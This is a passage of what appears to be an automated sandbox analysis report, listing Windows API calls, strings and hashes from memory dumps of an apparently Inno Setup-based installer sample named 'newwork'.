                                                                                        • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                                                        • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                                                        • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3557695338.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3557663419.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3557723561.0000000010002000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_10000000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                        • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                                                        • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                                                        • Instruction Fuzzy Hash:
                                                                                        APIs
                                                                                          • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
                                                                                        • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                        • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                        • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                        • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
                                                                                        • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
                                                                                        • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
                                                                                        • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
                                                                                        • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
                                                                                        • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
                                                                                        • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
                                                                                        • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
                                                                                        • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
                                                                                        • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
                                                                                        • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoadVersion
                                                                                        • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                        • API String ID: 1968650500-2910565190
                                                                                        • Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                        • Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
                                                                                        • Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
                                                                                        • Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0041CA40
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 0041CA4C
                                                                                        • CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
                                                                                        • CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
                                                                                        • SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
                                                                                        • FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
                                                                                        • SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
                                                                                        • SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
                                                                                        • PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 0041CB2B
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
                                                                                        • RealizePalette.GDI32(00000000), ref: 0041CB7D
                                                                                        • SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
                                                                                        • RealizePalette.GDI32(0041CE3C), ref: 0041CB95
                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
                                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
                                                                                        • BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041CBEE
                                                                                        • DeleteDC.GDI32(00000000), ref: 0041CC04
                                                                                          • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                        • String ID:
                                                                                        • API String ID: 269503290-0
                                                                                        • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                        • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                        • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                        • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                        • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                        Strings
                                                                                        • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                        • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                        • CoCreateInstance, xrefs: 004566AF
                                                                                        • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                        • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                        • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                        • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                        • IPersistFile::Save, xrefs: 00456962
                                                                                        • {pf32}\, xrefs: 0045671E
                                                                                        • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                        • IPropertyStore::Commit, xrefs: 004568E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInstance$FreeString
                                                                                        • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                        • API String ID: 308859552-2363233914
                                                                                        • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                        • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                        • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                        • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                        APIs
                                                                                        • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                        • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                        • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                          • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                        • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                        • API String ID: 2000705611-3672972446
                                                                                        • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                        • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                        • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                        • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                        • API String ID: 1452528299-3112430753
                                                                                        • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                        • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                        • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                        • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                        • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                        • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                          • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                        • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                        • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                        • API String ID: 59345061-4263478283
                                                                                        • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                        • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                        • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                        • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
                                                                                        APIs
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0041B3C3
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0041B3CD
                                                                                        • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3DF
                                                                                        • CreateBitmap.GDI32(0000000B,?,00000001,00000001,00000000), ref: 0041B3F6
                                                                                        • GetDC.USER32(00000000), ref: 0041B402
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,0000000B,?), ref: 0041B42F
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041B455
                                                                                        • SelectObject.GDI32(00000000,?), ref: 0041B470
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B47F
                                                                                        • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B4C7
                                                                                        • DeleteDC.GDI32(00000000), ref: 0041B4D0
                                                                                        • DeleteDC.GDI32(?), ref: 0041B4D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                        • String ID:
                                                                                        • API String ID: 644427674-0
                                                                                        • Opcode ID: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                        • Instruction ID: 0f3e5998203d07172116f12fa3fedaa120d09cd030f2870c51d139f455c41937
                                                                                        • Opcode Fuzzy Hash: 9212dc48eb065078ffd6e64a0fe4b3e7e755c3ed7e1f96497366cc94fc87ddf9
                                                                                        • Instruction Fuzzy Hash: E941AD71E44619AFDB10DAE9C846FEFB7BCEB08704F104466B614F7281D6786D408BA8
                                                                                        APIs
                                                                                          • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472D00
                                                                                        • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472E07
                                                                                        • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472E1D
                                                                                        • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472E42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                        • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                        • API String ID: 971782779-3668018701
                                                                                        • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                        • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                                                        • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                                                        • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                                          • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                        • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                                                        • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                                                        • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                                                        • RegOpenKeyEx, xrefs: 00454910
                                                                                        • , xrefs: 004548FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$FormatMessageOpen
                                                                                        • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                        • API String ID: 2812809588-1577016196
                                                                                        • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                        • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                                                        • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                                                        • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                                                        APIs
